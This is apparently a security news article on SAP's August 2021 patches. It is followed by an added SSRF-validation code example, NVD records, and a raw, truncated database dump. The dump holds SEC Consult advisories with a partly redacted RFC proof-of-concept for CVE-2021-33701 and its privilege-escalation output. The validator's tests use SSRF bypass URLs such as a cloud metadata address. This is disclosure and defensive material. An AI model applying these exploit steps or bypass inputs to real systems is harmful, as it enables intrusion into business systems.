SAP has released 19 new and updated [security patches](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806>), three of them rated as “HotNews” critical and six as high-priority.
“HotNews” is the severity rating that SAP gives to critical vulnerabilities. Two of this month’s sizzlers have a CVSS score of 9.9 and affect SAP Business One and SAP NetWeaver Development Infrastructure.
SAP applications help organizations manage critical business processes – including enterprise resource planning (ERP), product lifecycle management, customer relationship management (CRM) and supply-chain management.
One of the 9.9ers is CVE-2021-33698, an unrestricted file-upload issue (CWE-434) affecting SAP Business One, the German company's business-management software for small and medium-sized enterprises. The vulnerability allows an attacker with business authorization to upload any file, including script files, to the server without proper file-format validation. One caveat for anyone triaging by score: NVD later recorded the bug at CVSS 3.1 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H); the gap to SAP's 9.9 is the scope metric, since a scope-unchanged vector cannot reach 9.9.
According to Thomas Fritsch, an SAP security researcher at enterprise security firm Onapsis, the only reason it wasn’t given the top CVSS rating of 10 is because it needs a minimal set of authorizations.
In his Patch Day [writeup](<https://onapsis.com/blog/sap-security-patch-day-august-2021>), Fritsch noted that customers who can't immediately apply the related hotfix have a workaround: "Simply deactivate the affected functionality," he instructed. That is only a stopgap, and SAP, as always, stresses that the workaround is a temporary measure and not a permanent fix.
SAP described the second critical security bug, CVE-2021-33690, as a server-side request forgery (SSRF) affecting NetWeaver Development Infrastructure (SAP NWDI) in a servlet of the Component Build Service.
Onapsis said that the servlet was exposed to the outside world, "allowing attackers to perform proxy attacks by sending crafted queries." NVD's record (privileges required: low, no user interaction) frames the attacker as someone who already has some access to the server. According to Fritsch, SAP warned that the severity of the flaw depends on whether NWDI runs on the intranet or the internet, and the 9.9 reflects the worst case: an internet-facing NWDI, where the bug "could completely compromise sensitive data residing on the server, and impact its availability," as SAP put it in its note.
The third HotNews vulnerability, CVE-2021-33701, is a SQL injection in the SAP NZDT (Near Zero Downtime Technology) service used by S/4HANA and the DMIS mobile plug-in. Its CVSS score is 9.1: the attacker needs a highly privileged account (PR:H in NVD's vector), which is what keeps it below the two 9.9s, but a manipulated query can reach a superuser account, so confidentiality, integrity and availability are all rated high.
“The tool is used by SAP’s corresponding NZDT service for time-optimized system upgrades and system conversions,” Fritsch explained. “When using the NZDT service, the maintenance is performed on a clone of the production system. All changes are recorded and transferred to the clone after the maintenance tasks are completed. During the final downtime, only a few activities are executed, including a switch of the production to the new system (clone).”
Again, there’s a workaround available for customers who’ve activated the Unified Connectivity (UCON) runtime check, he wrote: Don’t assign the used remote-enabled function module to any communication assembly in UCON.
## Four Enterprise Portal Bugs
Onapsis gave a shout-out to Yvan Genuer, from the Onapsis Research Labs, who collaborated with SAP to fix four vulnerabilities in SAP Enterprise Portal.
One was CVE-2021-33702, a cross-site scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal caused by one of the portal's servlets and rated CVSS 8.3 by SAP. It involves insufficient sanitization that allows JavaScript to be injected into the corresponding web page: a victim who navigates to the affected servlet triggers the injected script in their browser. The impact is high, but successful exploitation would be "highly complex" and would require user interaction, Fritsch explained, which are the conditions that pulled its CVSS score down.
The quartet of Enterprise Portal patches includes a second XSS vulnerability, CVE-2021-33703, similarly found in another servlet of SAP NetWeaver Enterprise Portal and also rated CVSS 8.3 by SAP. NVD's entries describe the first as stored XSS (report data that is not sufficiently encoded) and the second as reflected XSS (unencoded URL parameters delivered through a crafted link), and score both at 6.1.
The third high-priority fix is CVE-2021-33705. This one addresses a server-side request forgery (SSRF) vulnerability in one of the design-time components of SAP NetWeaver Enterprise Portal (the Iviews Editor, per NVD, which scores it 8.1) that would allow an unauthenticated attacker to craft a malicious URL that, once a user clicks it, sends any type of request, POST or GET for example, to any internal or external server. NVD notes the result is access to or modification of data reachable from the Portal, with no availability impact.
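Both SSRF bugs on this Patch Day, CVE-2021-33690 in the NWDI Component Build Service and CVE-2021-33705 in the Portal's design-time component, come down to a server component fetching an attacker-chosen URL on someone else's behalf. The block below is an added example of the validation such a server-side fetch should apply before proxying a request; it is not SAP's code and makes no claim about how either component is implemented. The hostnames and the DNS table are constructed so the example runs offline, and the scheme and port policy is an assumption a real deployment would set for itself.

```python
import ipaddress
from urllib.parse import urlsplit

# Added example of outbound-URL validation against SSRF (CWE-918). It is not SAP's
# code; the policy constants below are assumptions for the example.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}

# Constructed DNS table standing in for a resolver so the example runs offline.
# Every hostname here is hypothetical.
CONSTRUCTED_DNS = {
    "repo.example.org": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    # A rebinding-style host that answers with one public and one internal address.
    "rebind.example.org": ["93.184.216.34", "10.0.0.5"],
}


def constructed_resolve(host):
    """Addresses a host resolves to; IP literals resolve to themselves."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return CONSTRUCTED_DNS.get(host, [])


def is_public_address(ip_text):
    """True only for globally routable unicast addresses; unwraps IPv4-mapped IPv6."""
    addr = ipaddress.ip_address(ip_text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_global and not addr.is_multicast


def check_outbound_url(url, resolve=constructed_resolve):
    """Decide whether a server-side component may fetch `url` for a caller.

    Returns (allowed, reason); every rejection carries a reason for the audit log.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    # "http://trusted.example.org@127.0.0.1/" has host 127.0.0.1, not trusted.example.org.
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed: %r" % port
    addresses = resolve(host)
    if not addresses:
        return False, "host does not resolve"
    # Reject if *any* answer is internal: a multi-answer or rebinding host must not
    # pass on its public record and then be fetched through its private one.
    for ip in addresses:
        if not is_public_address(ip):
            return False, "host resolves to non-public address %s" % ip
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("https://repo.example.org/builds/1",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://repo.example.org@127.0.0.1/",
                      "http://[::ffff:127.0.0.1]/",
                      "http://rebind.example.org/"):
        print(candidate, check_outbound_url(candidate))
```

In production the resolver would be `socket.getaddrinfo`, the HTTP client must connect to the address that passed the check rather than resolve the name a second time, and every redirect the client follows has to go through `check_outbound_url` again, since a 302 to an internal address is the usual way past a check that only looks at the first URL.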
The fourth hole that Onapsis worked with SAP to seal up, CVE-2021-33707, was tagged with a CVSS score of 6.1. It concerns a URL-redirection bug in SAP Knowledge Management that would allow remote attackers to "redirect users to arbitrary websites and conduct phishing attacks via a URL stored in a component," Fritsch detailed: a scenario that would give attackers the ability "to compromise the user's confidentiality and integrity."
The three remaining high-priority fixes address an authentication issue affecting SAP systems accessed through a Web Dispatcher, a task-hijacking issue in the Fiori Client mobile app for Android and a missing-authentication flaw in SAP Business One.
## Last Month = Calm, This Month = Storm
Given the nine critical and high-priority patches, Fritsch dubbed [last month's light SAP Patch Day](<https://onapsis.com/blog/sap-security-patch-day-july-2021-serious-vulnerabilities-sap-netweaver-java-fixed>) the "calm before the storm." Tuesday's raft of patches, he wrote, earns August the dubious honor of being "the most noteworthy SAP Patch Day this year" for customers.
“The small group of SAP applications that are affected by a CVSS 9.9 vulnerability in 2021 is now extended with SAP Business One and SAP NetWeaver Development Infrastructure,” Fritsch noted.
He had a word of caution for SAP Enterprise Portal customers in particular, given the four patches released for the app, three of them rated high priority.
## Critical Flaws Weaponized in Less Than 72 Hours
Enterprises will hopefully jump on the patches with utmost speed, given how fast SAP bugs are weaponized. An April threat intelligence [report](<https://www.onapsis.com/active-cyberattacks-business-critical-sap-applications>) from Onapsis and SAP found that critical SAP vulnerabilities are turned into exploits “in less than 72 hours of a patch release.” It’s even worse for new, unprotected SAP apps provisioned in cloud environments: They’re being discovered and compromised in less than three hours, according to the alert.
“Threat actors are active, capable and widespread,” the report advised, citing evidence of more than 300 automated exploitations leveraging seven SAP-specific attack vectors and 100+ hands-on-keyboard sessions from a wide range of threat actors. The companies found “clear evidence of sophisticated domain knowledge, including the implementation of SAP patches post-compromise.”
Adversaries were [carrying out a range of attacks](<https://threatpost.com/sap-bugs-cyberattack-compromise/165265/>), according to Onapsis and SAP, including theft of sensitive data, financial fraud, disruption of mission-critical business processes and other operational disruptions, and delivery of ransomware and other malware.
*Source record: Threatpost, "SAP Patches Nine Critical & High-Severity Bugs," by Lisa Vaas, published 2021-08-11 (https://threatpost.com/sap-patches-critical-bugs/168558/). CVEs referenced: CVE-2021-33690, CVE-2021-33698, CVE-2021-33701, CVE-2021-33702, CVE-2021-33703, CVE-2021-33705, CVE-2021-33707. Related entries in the source database: PACKETSTORM:165303, PACKETSTORM:165304, 1337DAY-ID-37147, 1337DAY-ID-37148.*
## NVD Records for the Seven CVEs

The NVD entries attached to this page, in the order the article discusses them. Note that NVD's CVSS 3.1 base scores differ from SAP's for CVE-2021-33698 (8.8 versus 9.9) and for the two Portal XSS bugs (6.1 versus 8.3).

**CVE-2021-33698** (published 2021-09-15; CWE-434)
- Affects: SAP Business One 10.0.
- CVSS 3.1: 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. CVSS 2.0: 6.5, AV:N/AC:L/Au:S/C:P/I:P/A:P.
- NVD description: "SAP Business One, version - 10.0, allows an attacker with business authorization to upload any files (including script files) without the proper file format validation."
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33698

**CVE-2021-33690** (published 2021-09-15; CWE-918)
- Affects: SAP NetWeaver Development Infrastructure Component Build Service 7.11, 7.20, 7.30, 7.31, 7.40, 7.50.
- CVSS 3.1: 9.9 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H. CVSS 2.0: 6.5, AV:N/AC:L/Au:S/C:P/I:P/A:P.
- NVD description: "Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50. The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability. Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet."
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33690

**CVE-2021-33701** (published 2021-09-15; CWE-89)
- Affects: DMIS Mobile Plug-In 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752, 710, 2020; SAPSCORE 125; S4CORE 102, 103, 104, 105.
- CVSS 3.1: 9.1 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H. CVSS 2.0: 6.5, AV:N/AC:L/Au:S/C:P/I:P/A:P.
- NVD description: "DMIS Mobile Plug-In or SAP S/4HANA [listed versions] allows an attacker with access to highly privileged account to execute manipulated query in NZDT tool to gain access to Superuser account, leading to SQL Injection vulnerability, that highly impacts systems Confidentiality, Integrity and Availability."
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33701

**CVE-2021-33702** (published 2021-08-10; CWE-79)
- Affects: NetWeaver Enterprise Portal 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50.
- CVSS 3.1: 6.1 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. CVSS 2.0: 2.6, AV:N/AC:H/Au:N/C:N/I:P/A:N.
- NVD description: "Under certain conditions, NetWeaver Enterprise Portal, versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode report data. An attacker can craft malicious data and print it to the report. In a successful attack, a victim opens the report, and the malicious script gets executed in the victim's browser, resulting in a Stored Cross-Site Scripting (XSS) vulnerability."
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33702

**CVE-2021-33703** (published 2021-08-10; CWE-79)
- Affects: NetWeaver Enterprise Portal 7.30, 7.31, 7.40, 7.50.
- CVSS 3.1: 6.1 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. CVSS 2.0: 2.6, AV:N/AC:H/Au:N/C:N/I:P/A:N.
- NVD description: "Under certain conditions, NetWeaver Enterprise Portal, versions - 7.30, 7.31, 7.40, 7.50, does not sufficiently encode URL parameters. An attacker can craft a malicious link and send it to a victim. A successful attack results in Reflected Cross-Site Scripting (XSS) vulnerability."
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33703

**CVE-2021-33705** (published 2021-09-15; CWE-918)
- Affects: SAP NetWeaver Portal 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, component Iviews Editor.
- CVSS 3.1: 8.1 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N. CVSS 2.0: 5.8, AV:N/AC:M/Au:N/C:P/I:P/A:N.
- NVD description: "The SAP NetWeaver Portal, versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, component Iviews Editor contains a Server-Side Request Forgery (SSRF) vulnerability which allows an unauthenticated attacker to craft a malicious URL which when clicked by a user can make any type of request (e.g. POST, GET) to any internal or external server. This can result in the accessing or modification of data accessible from the Portal but will not affect its availability."
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33705

**CVE-2021-33707** (published 2021-08-10; CWE-601)
- Affects: SAP NetWeaver Knowledge Management 7.30, 7.31, 7.40, 7.50.
- CVSS 3.1: 6.1 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. CVSS 2.0: 5.8, AV:N/AC:M/Au:N/C:P/I:P/A:N.
- NVD description: "SAP NetWeaver Knowledge Management allows remote attackers to redirect users to arbitrary websites and conduct phishing attacks via a URL stored in a component. This could enable the attacker to compromise the user's confidentiality and integrity."
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33707

CNVD record (truncated in the source): "SAP Business One is a suite of enterprise management software from SAP, a German company."
SAP Business One has a code issue vulnerability that stems from insufficient validation when uploading files, which could be exploited to upload any file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-16T00:00:00", "type": "cnvd", "title": "SAP Business One code issue vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33698"], "modified": "2022-08-22T00:00:00", "id": "CNVD-2022-58476", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-58476", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-12-15T17:15:50", "description": "", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T00:00:00", "type": "packetstorm", "title": "SAP Netweaver 
IUUC_RECON_RC_COUNT_TABLE_BIG ABAP Code Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33701"], "modified": "2021-12-15T00:00:00", "id": "PACKETSTORM:165304", "href": "https://packetstormsecurity.com/files/165304/SAP-Netweaver-IUUC_RECON_RC_COUNT_TABLE_BIG-ABAP-Code-Injection.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20211214-1 > \n======================================================================= \ntitle: Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG \nproduct: SAP Netweaver \nvulnerable version: SAP DMIS 2011_1_731 SP 0013 \nfixed version: see solution section below \nCVE number: CVE-2021-33701 \nSAP Note: 3078312 \nimpact: Critical \nCVSS 3.1 Score: 9.1 \nCVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H \nhomepage: https://www.sap.com/ \nfound: 2021-07-16 \nby: Raschin Tavakoli (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult, an Atos company \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"SAP SE is a German multinational software corporation based in Walldorf, \nBaden-W\u00fcrttemberg, that develops enterprise software to manage business \noperations and customer relations. The company is especially known for its ERP \nsoftware. 
SAP is the largest non-American software company by revenue, the \nworld's third-largest publicly-traded software company by revenue, and the \nlargest German company by market capitalisation.\" \n \nSource: https://en.wikipedia.org/wiki/SAP \n \n \nBusiness recommendation: \n------------------------ \nSAP\u00ae released the patch (SNote 3078312) and SEC Consult advises all SAP\u00ae \ncustomers to update their systems immediately. \n \nAn in-depth security analysis performed by security professionals is \nhighly advised, as the software may be affected from further security issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1. Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) \n \nThe IT_WHERE_CLAUSE parameter of the function module \nIUUC_RECON_RC_COUNT_TABLE_BIG is vulnerable to an ABAP Code Injection. \nUnfiltered user input is used to generate ABAP code dynamically via the \nGENERATE SUBROUTINE statement which then gets executed with a PERFORM \nstatement. As the attacker can freely choose the characters that can be used \nin these fields, he can execute arbitrary ABAP code. \n \nAs the affected function module is remote enabled, it allows attackers to \nperform remote attacks via RFC. \n \nNote that the vulnerable code part inside the function module has been changed \nin newer releases. The original code that was vulnerable to an ABAP Code \nInjection has been replaced with an ADBC driver call. Unfortunately, this \nchange also introduced an SQL injection vulnerability, which was addressed in \nSNote 3078312. \n \nThe issue has been reported in a separate SEC Consult advisory and can be viewed \nat the following URL: \n \nhttps://sec-consult.com/vulnerability-lab/advisory/remote-adbc-sql-injection-in-sap-netweaver \n \n \nAttack Prerequisites \n-------------------- \n1. 
Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) \n \nFirst prerequisite is the authorization object S_DMIS (SAP SLO Data migration \nserver) with at least the following settings: \n \nMBT_PR_ARE: SAP Landscape Transformation \nMBT_PR_LEV: (not needed to be set) \nACTVT: 03 Display \n \nNote that it is common practice that authorization objects are (mis)configured \nwith wildcards, which increases the likelihood of the vulnerability. \n \nFurther, of course, authorization to perform function calls (S_RFC) has to be \ngranted. \n \nIn the majority of cases internal RFC communications are nowadays still found \nto be unencrypted. This increases the risk that attackers wiretap DMIS related \naccount passwords. Once such user is hijacked, the attacker has gained all \nnecessary prerequisites for further attacks as described in this advisory. \n \n \nProof of concept: \n----------------- \n1. Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) \n \nAs a proof of concept, a script was created that assigns the attacker himself \nthe reference user DDIC inside the table REFUSER: \n \n* ************************************************************************** * \n#!/usr/bin/env python3 \nfrom pyrfc import Connection \n \nif __name__ == '__main__': \n \nmandt = {'000', '001'} # selected for demonstration purpose \nconn = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client=\"001\", \nuser=\"DEVELOPER\", passwd=\"Sap123456\", lang='EN') \n \nprint(\"USREFUS before:\") \nresult = conn.call('RFC_READ_TABLE', \nQUERY_TABLE='USREFUS', \nFIELDS=['MANDT', 'BNAME', 'REFUSER'], \nDELIMITER='|' \n) \ncolumn_values = [] \n \nfor line in result['DATA']: \nprint(line['WA']) \n \n[ --- PoC partially removed --- ] \n \nprint(\"\\nSending payload ...\\n\") \n \nresult = conn.call('RFC_READ_TABLE', \nQUERY_TABLE='USREFUS', \nFIELDS=['MANDT', 'BNAME', 'REFUSER'], \nDELIMITER='|' \n) \ncolumn_values = [] \n \nprint(\"USREFUS 
after:\") \nfor line in result['DATA']: \nprint(line['WA']) \n* ************************************************************************** * \n \nRunning the code produces the following output: \n \n$> iuuc_generic_abap.py \nUSREFUS before: \n001|DEVELOPER | \n001|BWDEVELOPER | \n001|TEST | \n001|E_TEST | \n001|DDIC | \n001|SAP* | \n \nSending payload ... \n \nUSREFUS after: \n001|BWDEVELOPER | \n001|TEST | \n001|E_TEST | \n001|DDIC | \n001|SAP* | \n001|DEVELOPER |DDIC \n \n \nVulnerable / tested versions: \n----------------------------- \nThis vulnerability has been tested on SAP Netweaver 752, 0001 (SP-Level), \nSAPK-11616INDMIS (Support Package) SAP DMIS 2011_1_731. \n \n \nVendor contact timeline: \n------------------------ \n2021-07-18: Contacting SAP Product Security Response Team through Web Portal \nhttps://www.sap.com/about/trust-center/security/incident-management.html \nID SR-21-00018 has been assigned \n2021-07-21: Vendor informs that the discussion has been taken up to the \napplication team \n2022-07-21: Vendor confirms vulnerability but marks it internally as a duplicate \nfor CVE-2021-33701 (see our other advisory for this function module) \n2021-11-17: SEC Consult sends final advisory to vendor and informs about release \ndate \n2021-12-14: Coordinated release of security advisory \n \n \nSolution: \n--------- \nSEC Consult advises all SAP\u00ae customers to implement SAP Security Note \n3078312 immediately. Note that Security Note 3078312 contains no automatic \ncorrection instructions for customers who run systems with DMIS versions or \nSupport Package levels lower than DMIS 2011 SP10 (2015). Please refer to the \nsection workaround. \n \n \nWorkaround: \n----------- \nIn lower SP levels, the correction can be applied manually by modifying \nfunction module IUUC_RECON_RC_COUNT_TABLE_BIG adding the following statement \ndirectly after the authorization check: \n \nASSERT it_where_clause[] IS INITIAL. 
\n \n \nAdvisory URL: \n------------- \nhttps://sec-consult.com/vulnerability-lab/ \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult, an Atos company \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an \nAtos company. It ensures the continued knowledge gain of SEC Consult in the \nfield of network and application security to stay ahead of the attacker. The \nSEC Consult Vulnerability Lab supports high-quality penetration testing and \nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities \nand valid recommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://sec-consult.com/career/ \n \nInterested in improving your cyber security with the experts of SEC Consult? 
\nContact our local offices https://sec-consult.com/contact/ \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF Raschin Tavakoli / @2021 \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165304/SA-20211214-1.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-15T17:14:56", "description": "", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T00:00:00", "type": "packetstorm", "title": "SAP Netweaver IUUC_RECON_RC_COUNT_TABLE_BIG SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33701"], "modified": "2021-12-15T00:00:00", "id": "PACKETSTORM:165303", "href": "https://packetstormsecurity.com/files/165303/SAP-Netweaver-IUUC_RECON_RC_COUNT_TABLE_BIG-SQL-Injection.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20211214-0 > 
\n============================================================================== \ntitle: Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG \nproduct: SAP Netweaver \nvulnerable version: see vulnerable/tested versions section below \nfixed version: see solution section below \nCVE number: CVE-2021-33701 \nSAP SNote: 3078312 \nimpact: Critical \nCVSS 3.1 Score: 9.1 \nCVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H \nhomepage: https://www.sap.com/ \nfound: 2021-07-07 \nby: Raschin Tavakoli (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult, an Atos company \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n============================================================================== \n \nVendor description: \n------------------- \n\"SAP SE is a German multinational software corporation based in Walldorf, \nBaden-W\u00fcrttemberg, that develops enterprise software to manage business \noperations and customer relations. The company is especially known for its ERP \nsoftware. SAP is the largest non-American software company by revenue, the \nworld's third-largest publicly-traded software company by revenue, and the \nlargest German company by market capitalisation.\" \n \nSource: https://en.wikipedia.org/wiki/SAP \n \n \nBusiness recommendation: \n------------------------ \nSAP\u00ae released the patch (SNote 3078312) and SEC Consult advises all \nSAP\u00ae customers to update their systems immediately. \n \nAn in-depth security analysis performed by security professionals is \nhighly advised, as the software may be affected from further security issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) \n \nThe IT_WHERE_CLAUSE parameter of the function module \nIUUC_RECON_RC_COUNT_TABLE_BIG is vulnerable to an ADBC SQL Injection. 
The \nfunction is part of the package CNV_INC_PROCESSING_REMOTE inside the function \nmodule group IUUC_REMOTE. It is typically used to count table records in the \ncontext of logging table and trigger creations. \n \nADBC is an API for the Native SQL interface of the AS ABAP that is based on \nABAP Objects and can be used to pass Native SQL statements to the database \ninterface. ADBC SQL injections are a very serious type of vulnerability as \nthey allow attackers not only to access data directly at the database layer \nbut also to break out of the current client context. Moreover, stacked queries \ncan be used to perform arbitrary read/write commands. All of this leads to \nfull compromise of the SAP application server. \n \nAs the affected function module is remote enabled, it allows attackers to \nperform remote attacks via RFC. \n \nNote that the vulnerability was originally found by SEC Consult during a \nresearch on a system with DMIS in version DMIS 2011_1_731 SP 0013. In this \nversion, the same parameter IT_WHERE_CLAUSE was vulnerable to an ABAP \nCommand Injection. \n \nThe vulnerability seems to have been fixed insufficiently, leaving behind this \nADBC SQL Injection. The advisory can be viewed at the following URL: \n \nhttps://sec-consult.com/vulnerability-lab/advisory/remote-abap-code-injection-in-sap-netweaver/ \n \n \nAttack Prerequisites \n-------------------- \n1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) \n \nFirst prerequisite is the authorization object S_DMIS (SAP SLO Data migration \nserver) with at least the following settings: \n \nMBT_PR_ARE: SAP Landscape Transformation \nMBT_PR_LEV: (not needed to be set) \nACTVT: 03 Display \n \nNote that it is common practice that authorization objects are (mis)configured \nwith wildcards, which increases the likelihood of exploitation of the vulnerability. 
